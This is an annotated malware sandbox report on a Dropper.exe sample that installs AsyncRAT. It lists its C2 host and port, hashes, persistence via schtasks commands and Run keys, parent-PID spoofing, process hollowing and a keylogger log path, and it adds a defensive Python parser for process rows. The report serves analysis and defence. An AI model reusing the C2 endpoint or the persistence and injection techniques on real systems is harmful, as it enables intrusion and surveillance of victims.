Analysis
max time kernel: 105s
max time network: 154s
platform: windows10-2004_x64
resource: win10v2004-20240226-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
submitted: 22-06-2024 08:24
Static task: static1
Behavioral task: behavioral1 (sample Dropper.exe, resource win7-20240508-en)
Behavioral task: behavioral2 (sample Dropper.exe, resource win10v2004-20240226-en)

The signatures and process tree below are from behavioral2, the Windows 10 run named in the Analysis header; the Windows 7 run is not reproduced on this page.
General
Target: Dropper.exe
Size: 12KB
MD5: b11d9f89c1129428957175b7c55e8637
SHA1: 6a1530364e3bf3c13a6500bdd313e1d8d4294301
SHA256: b390f949531dac7a42bee35fc98e1b9890361b2be5fa3efcc8cae8263174244f
SHA512: e368f3db1c511c6cfbb95f04c98e9df7fcda718f3f9c56dd34f5e9595eda9d072dc4af351a7ea7a2cea6f65117f7e2dd98fc97d6d6631673fdcdf939abe963ba
SSDEEP: 384:fHPFcbjfi27q9bJnz6PbQGw+pfolwmfhhDj4VCsL:3yfiD9bJMbKwkhhD0wsL
Malware Config
Extracted family: asyncrat
group: Default
C2: environmental-blank.gl.at.ply.gg:25944
delay: 1
install: true
install_file: $77-aachost.exe
install_folder: %AppData%

Three things to read out of this config before acting on it:
- The C2 host sits under at.ply.gg, the domain used by the playit.gg tunnelling service (the report's "Legitimate hosting services abused" signature). The operator's real endpoint is behind the tunnel, so block and hunt on the full hostname and port, not on whatever IP the sandbox resolved at run time.
- %AppData% resolves per account. For the Admin user it is C:\Users\Admin\AppData\Roaming; for LocalSystem it is C:\Windows\system32\config\systemprofile\AppData\Roaming, which is exactly where the "Drops file in System32 directory" rows show $77-aachost.exe and $77-scchost.exe being written. The install routine therefore ran under SYSTEM at some point in this run.
- Every dropped file, scheduled task and Run value in this report carries a $77- prefix. That is the naming convention the open-source r77 rootkit uses to decide what to hide (files, processes, registry values, scheduled tasks whose names begin with $77). Nothing on this page shows r77 itself being installed, so treat the prefix as a lead to check for on a live host, not as a detection.
Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess (1 IoC)
Processes (description | pid | process | target process):
- PID 1308 created 632 | 1308 | powershell.EXE | winlogon.exe

Read this row together with the SetThreadContext and WriteProcessMemory rows further down (powershell.EXE 1308 writes into and sets the thread context of dllhost.exe 1724) and with the process tree, where that dllhost.exe instance appears as a child of winlogon.exe: the picture is consistent with the PowerShell stage spawning dllhost.exe with winlogon.exe as a spoofed parent, then hollowing it. Parent-PID spoofing defeats tree-based detections that key on "powershell.exe spawned X"; a detection here has to come from the NtCreateUserProcess attributes or from the cross-process writes.
Async RAT payload (1 IoC)
Processes (resource | yara_rule):
- C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe | family_asyncrat

Downloads MZ/PE file
No IoC rows are given for this signature on the page. The downloads themselves are visible as the cmd.exe -> curl.exe chains that Dropper.exe spawns in the "Suspicious use of WriteProcessMemory" section, one chain per dropped $77-*.exe.
Checks BIOS information in registry (2 TTPs, 2 IoCs)
BIOS information is often read in order to detect sandboxing environments.
Processes (description | ioc | process):
- Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | wmiprvse.exe
- Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | wmiprvse.exe

Caveat: wmiprvse.exe is the WMI provider host. It reads these values while servicing a WMI query (for example Win32_BIOS) on behalf of some client, and the report does not show which client issued the query. The same applies to the SCSI and processor rows below. A WMI-based sandbox check from the sample is one explanation; background OS activity is another.
Checks computer location settings (2 TTPs, 4 IoCs)
Looks up country code configured in the registry, likely geofence.
Processes (description | ioc | process):
- Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | Dropper.exe
- Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | Dropper.exe
- Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | $77-aachost.exe
- Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | $77-sdchost.exe
Executes dropped EXE (10 IoCs)
Processes (pid | process):
- 2316 | $77-aachost.exe
- 4304 | $77-sdchost.exe
- 1736 | $77-penisballs.exe
- 2236 | $77-aachost.exe
- 1396 | $77-install.exe
- 1700 | $77-scchost.exe
- 1372 | $77-aachost.exe
- 4496 | $77-sdchost.exe
- 1224 | $77-penisballs.exe
- 5660 | $77-scchost.exe

Each of $77-aachost.exe, $77-sdchost.exe and $77-penisballs.exe runs twice (a first instance started by Dropper.exe, then a later instance), and $77-scchost.exe is the copy the scheduled task and Run key point at.
Adds Run key to start application (2 TTPs, 1 IoC)
Processes (description | ioc | process):
- Set value (str) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$77-scchost = "C:\\Users\\Admin\\AppData\\Roaming\\$77-scchost.exe" | $77-sdchost.exe

The value is written in the Admin user's hive (S-1-5-21-...-1000), so this is the user-level instance of $77-sdchost.exe; the scheduled task created by $77-sdchost.exe in the process tree points at the SYSTEM-profile copy instead. Both the value name and the target file carry the $77- prefix.
Checks installed software on the system (1 TTP)
Looks up Uninstall key entries in the registry to enumerate software on the system.

Legitimate hosting services abused for malware hosting/C2 (1 TTP, 4 IoCs)
The four IoC rows are not reproduced on this page; the C2 hostname in the Malware Config section is on the playit.gg tunnel domain.
Drops file in System32 directory (18 IoCs)
Processes (description | ioc | process):
- File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Roaming\MyData\DataLogs.conf | $77-penisballs.exe
- File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\$77-aachost.exe.log | $77-aachost.exe
- File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.EXE
- File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work | svchost.exe
- File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | svchost.exe
- File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml | OfficeClickToRun.exe
- File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx | svchost.exe
- File created | C:\Windows\system32\config\systemprofile\AppData\Roaming\$77-aachost.exe | $77-aachost.exe
- File created | C:\Windows\system32\config\systemprofile\AppData\Roaming\$77-scchost.exe | $77-sdchost.exe
- File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work | svchost.exe
- File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 | svchost.exe
- File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work | svchost.exe
- File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | svchost.exe
- File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 | svchost.exe
- File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A | svchost.exe
- File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | powershell.EXE
- File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan | svchost.exe
- File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 | svchost.exe

Only five of these rows are the sample's doing: the two $77-*.exe copies written to the SYSTEM profile's Roaming folder, the two CLR usage logs (which show that $77-aachost.exe and the PowerShell stage both ran .NET code as SYSTEM), and MyData\DataLogs.conf. That last file is the path AsyncRAT's keylogger component writes captured keystrokes to, and it comes from $77-penisballs.exe, the same process that fires "Suspicious use of SetWindowsHookEx" below; pull it from the disk image. The svchost.exe task-file, CryptnetUrlCache and event-log rows and the OfficeClickToRun.exe rule file are background OS and Office activity that the signature counts anyway.
Suspicious use of SetThreadContext (1 IoC)
Processes (description | pid | process | target process):
- PID 1308 set thread context of 1724 | 1308 | powershell.EXE | dllhost.exe
Drops file in Windows directory (1 IoC)
Processes (description | ioc | process):
- File opened for modification | C:\Windows\Logs\CBS\CBS.log | TiWorker.exe

This is the servicing stack writing its own log and is unrelated to the sample.

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).
Checks SCSI registry key(s) (3 TTPs, 18 IoCs)
SCSI information is often read in order to detect sandboxing environments.
Processes: all 18 rows are wmiprvse.exe, under \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\.
- CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000: key opened (the device key itself and LogConf); values queried HardwareID, Mfg, DeviceDesc, Service, ConfigFlags, FriendlyName, CompatibleIDs
- Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000: key opened (the device key itself and LogConf); values queried HardwareID, ConfigFlags, CompatibleIDs, DeviceDesc, Mfg, Service, FriendlyName

The DADY vendor and product strings are those of the analysis VM's virtual drives. As with the BIOS rows, the reads are performed by the WMI provider host on behalf of an unidentified client.
Checks processor information in registry (2 TTPs, 12 IoCs)
Processor information is often read in order to detect sandboxing environments.
Processes: all rows are under \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0.
- wmiprvse.exe: key queried; key opened; key security queried; values queried Component Information, ProcessorNameString, Identifier
- mousocoreworker.exe: key opened (twice, once via the \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 spelling); values queried ProcessorNameString, Platform Specific Field 1, ~MHz, Identifier
Delays execution with timeout.exe (2 IoCs)
Processes (pid | process):
- 4988 | timeout.exe
- 5300 | timeout.exe

Both come from the temporary .bat that $77-aachost.exe runs after installing itself (cmd.exe /c tmp58D9.tmp.bat -> timeout 3 in the process tree, followed by the re-launch of $77-aachost.exe recorded under "Suspicious use of WriteProcessMemory" as 2524 cmd.exe -> 2236 $77-aachost.exe).
Enumerates system info in registry (2 TTPs, 3 IoCs)
Processes (description | ioc | process):
- Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | mousocoreworker.exe
- Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | wmiprvse.exe
- Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | mousocoreworker.exe
Modifies data under HKEY_USERS (64 IoCs)
Processes: all paths below are under \REGISTRY\USER\.DEFAULT\Software\; the operation is "Key created" unless stated otherwise. Grouped by process.

$77-penisballs.exe (22 rows):
- \REGISTRY\USER\.DEFAULT\Software (the Software key itself); Microsoft; Microsoft\ActiveMovie; Microsoft\ActiveMovie\devenum 64-bit
- Set value (int) Microsoft\ActiveMovie\devenum 64-bit\Version = "7"
- Microsoft\SystemCertificates\Disallowed; Microsoft\SystemCertificates\Disallowed\Certificates
- Microsoft\SystemCertificates\Root; Microsoft\SystemCertificates\Root\CRLs; Microsoft\SystemCertificates\Root\CTLs
- Microsoft\SystemCertificates\TrustedPeople; Microsoft\SystemCertificates\TrustedPeople\CTLs
- Microsoft\SystemCertificates\trust; Microsoft\SystemCertificates\trust\Certificates; Microsoft\SystemCertificates\trust\CRLs; Microsoft\SystemCertificates\trust\CTLs
- Policies\Microsoft\SystemCertificates\CA; Policies\Microsoft\SystemCertificates\CA\Certificates; Policies\Microsoft\SystemCertificates\CA\CTLs; Policies\Microsoft\SystemCertificates\CA\CRLs
- Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates; Policies\Microsoft\SystemCertificates\trust\CRLs

powershell.EXE (18 rows):
- Microsoft\SystemCertificates\CA; Microsoft\SystemCertificates\CA\Certificates
- Microsoft\SystemCertificates\Disallowed\Certificates; Microsoft\SystemCertificates\Disallowed\CTLs
- Microsoft\SystemCertificates\Root\Certificates; Microsoft\SystemCertificates\Root\CRLs; Microsoft\SystemCertificates\Root\CTLs
- Microsoft\SystemCertificates\SmartCardRoot\CTLs
- Microsoft\SystemCertificates\TrustedPeople\Certificates; Microsoft\SystemCertificates\TrustedPeople\CRLs
- Microsoft\SystemCertificates\trust\Certificates
- Policies\Microsoft\SystemCertificates\CA; Policies\Microsoft\SystemCertificates\CA\CRLs
- Policies\Microsoft\SystemCertificates\Disallowed\CRLs; Policies\Microsoft\SystemCertificates\Disallowed\CTLs
- Policies\Microsoft\SystemCertificates\TrustedPeople; Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs
- Policies\Microsoft\SystemCertificates\trust\CRLs

dllhost.exe (4 rows):
- Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\
- Set value (int) Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"
- Set value (int) Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"
- Set value (int) Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"

$77-aachost.exe (2 rows):
- Set value (int) Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"
- Set value (int) Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"

$77-sdchost.exe (3 rows):
- Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\
- Set value (int) Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"
- Set value (int) Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"

mousocoreworker.exe (3 rows):
- \REGISTRY\USER\.DEFAULT\Software (the Software key itself); Microsoft; Microsoft\Windows

OfficeClickToRun.exe (4 rows):
- Microsoft\Office\16.0
- Set value (str) Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Sat, 22 Jun 2024 08:26:04 GMT"
- Set value (int) Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1719044763"
- Set value (str) Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={2D91B293-3CCF-4F1C-8471-7C9DB36D76A1}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&"

svchost.exe (6 rows):
- Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02dlyduymzsmoetq
- Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02hzvqoaalretqyt
- Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02nnqrjpfthalfch
- Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02qqfktqqrppjgpz
- Set value (str) Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02nnqrjpfthalfch\Provision Saturday, June 22, 2024 08:25:06 = "AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAzMaTND0zrkSMSIDJLfiUBwAAAAACAAAAAAAQZgAAAAEAACAAAABYKSrm/Pf4YzU58W3mWk55MHR4DxIKqWChJb7vdCnLpgAAAAAOgAAAAAIAACAAAAAstyqLUoCqhOZiHC7L1WPzTxBl6q/0Bwm1ZJUk3fyBFyAAAAB+RyEH0mTzZKy/cKRVfGmN4WHdDruMYOZ886evrZikBUAAAADs8KntJHkVwnkX8Mkj0+9xDFP1Ly0MHgBe4+1Z8I/j0hrPJoiCSHzsONMxWC85exDPTSTt7qk2IgRpEQlL1hWZ"
- Set value (str) Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02hzvqoaalretqyt\Provision Saturday, June 22, 2024 08:25:05 = "AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAzMaTND0zrkSMSIDJLfiUBwAAAAACAAAAAAAQZgAAAAEAACAAAABGaxqNl9HXOYmCvftovEmiuSrlfmALhNx7jdLLACkVYgAAAAAOgAAAAAIAACAAAACTpA6Tb+MN0xpPRRSmUcFBV217nKYMqc97mfc5TXFqfiAAAACuVMF2bWJ51gOrbOg/o8f8210CzEtqm5vHoAKnhyOUi0AAAACAvqttHccs8xIS5ipz2dANyYXeLeH6KM6p1gRqa0P5XdQI5YHOOI7dF3+BbGZp7K8cel/HERkohQJ9VJ3Ycgij"

cmd.exe (2 rows):
- Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
- Set value (data) Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{289AF617-1CC3-42A6-926C-E6A863F0E3BA} {ADD8BA80-002B-11D0-8F0F-00C04FD7D062} 0xFFFF = 0100000000000000d7be53b27dc4da01

How to read this: .DEFAULT is the hive LocalSystem uses, and the SystemCertificates and Internet Settings\ZoneMap subkeys are created automatically by the .NET crypto stack and WinINet the first time a process under that account touches them. These rows do not show certificate-store tampering; what they do show is that $77-penisballs.exe, $77-aachost.exe, $77-sdchost.exe, the PowerShell stage and the dllhost.exe it hollowed all ran as SYSTEM. The mousocoreworker.exe, OfficeClickToRun.exe, svchost.exe (IdentityCRL) and cmd.exe rows are background activity.
Scheduled Task/Job: Scheduled Task (1 TTP, 4 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes (pid | process):
- 1804 | schtasks.exe
- 5244 | schtasks.exe
- 2668 | schtasks.exe
- 4860 | schtasks.exe

The two command lines the process tree preserves are shown there: one task that re-runs $77-aachost.exe at every logon with highest privileges, and one that re-runs $77-scchost.exe every minute with highest privileges. 2668 and 4860 are the children of the first $77-aachost.exe and $77-sdchost.exe instances (see "Suspicious use of WriteProcessMemory"); the parents of 1804 and 5244 are not recorded in the capped table.
Suspicious behavior: EnumeratesProcesses (64 IoCs)
Processes (pid | process | number of rows):
- 2316 | $77-aachost.exe | 23
- 1736 | $77-penisballs.exe | 5
- 1308 | powershell.EXE | 4
- 1724 | dllhost.exe | 4
- 1372 | $77-aachost.exe | 24
- 1224 | $77-penisballs.exe | 4

The table is capped at 64 rows, so the counts are a floor, not a total.
Suspicious use of AdjustPrivilegeToken (64 IoCs)
Processes (token | pid | process), grouped:
- SeDebugPrivilege | 4304 | $77-sdchost.exe (2 rows)
- SeDebugPrivilege | 1736 | $77-penisballs.exe
- SeDebugPrivilege | 2316 | $77-aachost.exe
- SeDebugPrivilege | 1308 | powershell.EXE (2 rows)
- SeDebugPrivilege | 1700 | $77-scchost.exe
- SeDebugPrivilege | 1724 | dllhost.exe
- SeDebugPrivilege | 4496 | $77-sdchost.exe (2 rows)
- SeDebugPrivilege | 1224 | $77-penisballs.exe
- SeDebugPrivilege | 1372 | $77-aachost.exe
- SeDebugPrivilege | 2180 | wmiprvse.exe
- SeAuditPrivilege | 2076 | svchost.exe
- SeAuditPrivilege | 2740 | svchost.exe (2 rows)
- 2840 | svchost.exe: four rounds (48 rows) of the service privilege set SeAssignPrimaryTokenPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeSystemEnvironmentPrivilege, SeUndockPrivilege, SeManageVolumePrivilege; two of the rounds also adjust SeSystemtimePrivilege and the other two adjust the privilege the report prints as "31" (LUID 31 is SeTrustedCredManAccessPrivilege in the winnt.h numbering)

The rows that matter are the SeDebugPrivilege enables by every $77-* instance, the PowerShell stage and the hollowed dllhost.exe: that privilege is what a .NET RAT needs to open other processes for injection or enumeration. The svchost.exe rounds are ordinary service-host behaviour, and wmiprvse.exe enables SeDebugPrivilege routinely when servicing process-related WMI queries.
Suspicious use of SetWindowsHookEx (2 IoCs)
Processes (pid | process):
- 1736 | $77-penisballs.exe
- 1224 | $77-penisballs.exe

Both instances of $77-penisballs.exe install a Windows hook, and the same binary writes %AppData%\MyData\DataLogs.conf (see "Drops file in System32 directory"), which together is the footprint of AsyncRAT's hook-based keylogger.
Suspicious use of WriteProcessMemory (64 IoCs)
Processes: each row in the report reads "PID A wrote to memory of B | A | process | target process"; a parent writes into a child it is creating, so these rows double as a parent/child map. Repeated rows are collapsed here with their count.
- 4544 Dropper.exe -> 1964 Dropper.exe (3)
- 1964 Dropper.exe -> 2684 cmd.exe (3); 2684 cmd.exe -> 3692 curl.exe (3)
- 1964 Dropper.exe -> 3920 cmd.exe (3); 3920 cmd.exe -> 3916 curl.exe (3)
- 1964 Dropper.exe -> 2316 $77-aachost.exe (2)
- 1964 Dropper.exe -> 3904 cmd.exe (3); 3904 cmd.exe -> 4932 curl.exe (3)
- 1964 Dropper.exe -> 4304 $77-sdchost.exe (2)
- 1964 Dropper.exe -> 4216 cmd.exe (3); 4216 cmd.exe -> 700 curl.exe (3)
- 1964 Dropper.exe -> 1736 $77-penisballs.exe (2)
- 1964 Dropper.exe -> 3804 cmd.exe (3); 3804 cmd.exe -> 5104 curl.exe (3)
- 2316 $77-aachost.exe -> 1696 cmd.exe (2); 1696 cmd.exe -> 2668 schtasks.exe (2)
- 2316 $77-aachost.exe -> 2524 cmd.exe (2); 2524 cmd.exe -> 4988 timeout.exe (2); 2524 cmd.exe -> 2236 $77-aachost.exe (2)
- 4304 $77-sdchost.exe -> 4860 schtasks.exe (2)
- 1964 Dropper.exe -> 1396 $77-install.exe (3)
- 1964 Dropper.exe -> 2980 cmd.exe (3); 2980 cmd.exe -> 4696 curl.exe (3)
- 4396 cmd.exe -> 1068 curl.exe (2) (the parent of 4396 is not in the table)
- 1308 powershell.EXE -> 1724 dllhost.exe (2)

What the map shows: Dropper.exe (4544) re-launches itself (1964); that instance runs cmd.exe -> curl.exe six times, starting a dropped $77-*.exe after most of the downloads, in the order $77-aachost.exe, $77-sdchost.exe, $77-penisballs.exe, $77-install.exe. $77-aachost.exe then registers its logon task and runs the timeout-then-relaunch batch; $77-sdchost.exe registers the every-minute task. The final row is the PowerShell stage creating dllhost.exe, the process it hollows. The table stops at 64 rows, so the parents of the second-run instances (1372, 4496, 1224, 5660) and of cmd.exe 4396 are missing.
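A parser for that row format, as an added example that is not part of the sandbox report. ROWS is a subset of the report's rows, copied in the report's own wording (one row per line); the regular expression, the lineage walk and the cmd.exe -> curl.exe chain finder are the author's. The script collapses duplicates into a counted edge list, rebuilds each process's ancestry, and lists every download chain together with the process that started it.

```python
"""Rebuild parent/child relationships from a sandbox "wrote to memory" table.

Added example, not part of the sandbox report. ROWS is a subset of the report's
"Suspicious use of WriteProcessMemory" rows, one per line in the report's own
wording; parsing and chain logic are the author's.
"""
import re
from collections import Counter

# Subset of the report's rows (constructed excerpt, counts match the report).
ROWS = """\
PID 4544 wrote to memory of 1964 4544 Dropper.exe Dropper.exe
PID 4544 wrote to memory of 1964 4544 Dropper.exe Dropper.exe
PID 4544 wrote to memory of 1964 4544 Dropper.exe Dropper.exe
PID 1964 wrote to memory of 2684 1964 Dropper.exe cmd.exe
PID 1964 wrote to memory of 2684 1964 Dropper.exe cmd.exe
PID 1964 wrote to memory of 2684 1964 Dropper.exe cmd.exe
PID 2684 wrote to memory of 3692 2684 cmd.exe curl.exe
PID 2684 wrote to memory of 3692 2684 cmd.exe curl.exe
PID 2684 wrote to memory of 3692 2684 cmd.exe curl.exe
PID 1964 wrote to memory of 2316 1964 Dropper.exe $77-aachost.exe
PID 1964 wrote to memory of 2316 1964 Dropper.exe $77-aachost.exe
PID 2316 wrote to memory of 1696 2316 $77-aachost.exe cmd.exe
PID 2316 wrote to memory of 1696 2316 $77-aachost.exe cmd.exe
PID 2316 wrote to memory of 2524 2316 $77-aachost.exe cmd.exe
PID 2316 wrote to memory of 2524 2316 $77-aachost.exe cmd.exe
PID 2524 wrote to memory of 4988 2524 cmd.exe timeout.exe
PID 2524 wrote to memory of 4988 2524 cmd.exe timeout.exe
PID 1696 wrote to memory of 2668 1696 cmd.exe schtasks.exe
PID 1696 wrote to memory of 2668 1696 cmd.exe schtasks.exe
PID 2524 wrote to memory of 2236 2524 cmd.exe $77-aachost.exe
PID 2524 wrote to memory of 2236 2524 cmd.exe $77-aachost.exe
PID 1964 wrote to memory of 1396 1964 Dropper.exe $77-install.exe
PID 1964 wrote to memory of 1396 1964 Dropper.exe $77-install.exe
PID 1964 wrote to memory of 1396 1964 Dropper.exe $77-install.exe
PID 4396 wrote to memory of 1068 4396 cmd.exe curl.exe
PID 4396 wrote to memory of 1068 4396 cmd.exe curl.exe
PID 1308 wrote to memory of 1724 1308 powershell.EXE dllhost.exe
PID 1308 wrote to memory of 1724 1308 powershell.EXE dllhost.exe
"""

# "PID <writer> wrote to memory of <target> <writer> <writer image> <target image>"
ROW_RE = re.compile(r"PID (\d+) wrote to memory of (\d+) \1 (\S+) (\S+)")


def parse_rows(text: str) -> Counter:
    """Counted edges keyed by (parent_pid, parent_name, child_pid, child_name)."""
    edges = Counter()
    for line in text.splitlines():
        m = ROW_RE.search(line)
        if m:
            ppid, cpid, pname, cname = m.groups()
            edges[(int(ppid), pname, int(cpid), cname)] += 1
    return edges


def process_tree(edges: Counter):
    """Return (names, parents): pid -> image name, child pid -> parent pid."""
    names, parents = {}, {}
    for ppid, pname, cpid, cname in edges:
        names.setdefault(ppid, pname)
        names[cpid] = cname
        parents[cpid] = ppid
    return names, parents


def lineage(names: dict, parents: dict, pid: int) -> list:
    """Ancestry of a pid as 'name(pid)' strings, root first; stops where the table ends."""
    chain, seen = [], set()
    while pid in names and pid not in seen:
        seen.add(pid)
        chain.append(f"{names[pid]}({pid})")
        pid = parents.get(pid)
    return chain[::-1]


def download_chains(edges: Counter, names: dict, parents: dict) -> list:
    """(grandparent name or None, cmd pid, curl pid) for every cmd.exe -> curl.exe edge."""
    out = []
    for ppid, pname, cpid, cname in edges:
        if pname.lower() == "cmd.exe" and cname.lower() == "curl.exe":
            out.append((names.get(parents.get(ppid)), ppid, cpid))
    return out


if __name__ == "__main__":
    edges = parse_rows(ROWS)
    names, parents = process_tree(edges)
    for edge, n in edges.items():
        print(f"{edge[1]}({edge[0]}) -> {edge[3]}({edge[2]})  x{n}")
    print("schtasks lineage:", " > ".join(lineage(names, parents, 2668)))
    print("download chains:", download_chains(edges, names, parents))
```

The chain for cmd.exe 4396 comes back with no grandparent: that is the capped-table gap, and it is worth surfacing explicitly rather than silently dropping, because a detection built on "Dropper.exe -> cmd.exe -> curl.exe" would miss that download.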
Uses Task Scheduler COM API (1 TTP)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
Depth is shown by indentation. Each entry gives the image path, then the command line, then the signatures that fired for that process.

Reading the tree: dllhost.exe is launched with the ordinary COM-surrogate /Processid:{CLSID} command line, so nothing in the line itself looks wrong; it is the process that powershell.EXE 1308 wrote into and set the thread context of, and it appears under winlogon.exe rather than under PowerShell (see "Suspic­ious use of NtCreateUserProcessOtherParentProcess"). The three $77-*.exe entries beneath it are the re-launched instances, started from the Temp drop location but running under the SYSTEM profile. The Dropper.exe subtree that started the first instances is not part of this excerpt; its children are recorded under "Suspicious use of WriteProcessMemory". The powershell.EXE entry at the end is the start of the chain (Schedule service -> taskhostw.exe -> PowerShell) and its command line is cut off in the source.

C:\Windows\system32\winlogon.exe
  cmd: winlogon.exe
  C:\Windows\system32\dwm.exe
    cmd: "dwm.exe"
  C:\Windows\System32\dllhost.exe
    cmd: C:\Windows\System32\dllhost.exe /Processid:{27885a73-c420-4253-ae9c-f13098271dfd}
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe
      cmd: "C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe"
      - Executes dropped EXE
      - Drops file in System32 directory
      - Modifies data under HKEY_USERS
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      C:\Windows\System32\cmd.exe
        cmd: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Windows\system32\config\systemprofile\AppData\Roaming\$77-aachost.exe"' & exit
        C:\Windows\System32\Conhost.exe
          cmd: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        C:\Windows\system32\schtasks.exe
          cmd: schtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Windows\system32\config\systemprofile\AppData\Roaming\$77-aachost.exe"'
          - Scheduled Task/Job: Scheduled Task
      C:\Windows\system32\cmd.exe
        cmd: C:\Windows\system32\cmd.exe /c ""C:\Windows\TEMP\tmp58D9.tmp.bat""
        - Modifies data under HKEY_USERS
        C:\Windows\System32\Conhost.exe
          cmd: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        C:\Windows\system32\timeout.exe
          cmd: timeout 3
          - Delays execution with timeout.exe
    C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe
      cmd: "C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe"
      - Executes dropped EXE
      - Drops file in System32 directory
      - Modifies data under HKEY_USERS
      - Suspicious use of AdjustPrivilegeToken
